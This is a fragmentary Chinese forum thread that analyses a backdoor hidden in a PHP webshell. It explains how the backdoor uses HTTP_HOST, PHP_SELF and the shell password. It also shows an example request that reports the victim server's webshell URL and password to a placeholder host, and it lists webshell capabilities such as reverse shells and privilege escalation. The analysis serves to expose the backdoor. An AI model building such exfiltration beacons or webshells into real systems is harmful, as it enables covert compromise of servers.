PHP大马后门分析

编程开发   © 文章版权由 admin 解释,禁止匿名转载

#楼主# 2021-7-25

PHP大马,用php写的木马文件,一般自带提权,操作数据库,反弹shell,文件下载,端口扫描等功能。网上很多地方都能下载到这些木马,但是大部门大马都会自带有后门,也就是当你上传木马到别人的服务器上的时候,该大马的制作者同样会通过后门获得服务器的权限。今天就来分析一波该大马中的后门。

这世面还有啥东西没后门[阴险]
我们接下看再看后面的PHP函数
$_SERVER['HTTP_HOST']
接触过PHP的小伙伴应该知道这个函数的意思
在HTTP/1.1协议规范下,会根据客户端的HTTP请求输出信息
也就是获取当前域名
xxx.xxx

好兄弟图片违规了[疑问]
25楼
氷羽藍汐 2021-7-25
在hello,world里放后门的少[滑稽]
你俩别唠了让我发完文章
好的表哥[真棒]
我们再看第二个函数
$_SERVER['PHP_SELF']
获取当前页面地址
通过上面的$_SERVER['HTTP_HOST']函数
这段代码可以获取当前打开PHP大马的域名和路径
xxx.xxxxx.php
http://xxxxx.com/?hm=http://www.test.com/webshell/webshell.php||admin&bz=php

你这为什么都是图片违规
我们接下来看第三个参数
.$password
获取当前大马密码

评论

登录后才可发表内容
  • 主题

    3

  • 帖子

    26

  • 关注者

    0

Copyright © 2019 凯特网.   Powered by HYBBS 2.3.4  

Runtime:0.0408s Mem:2118Kb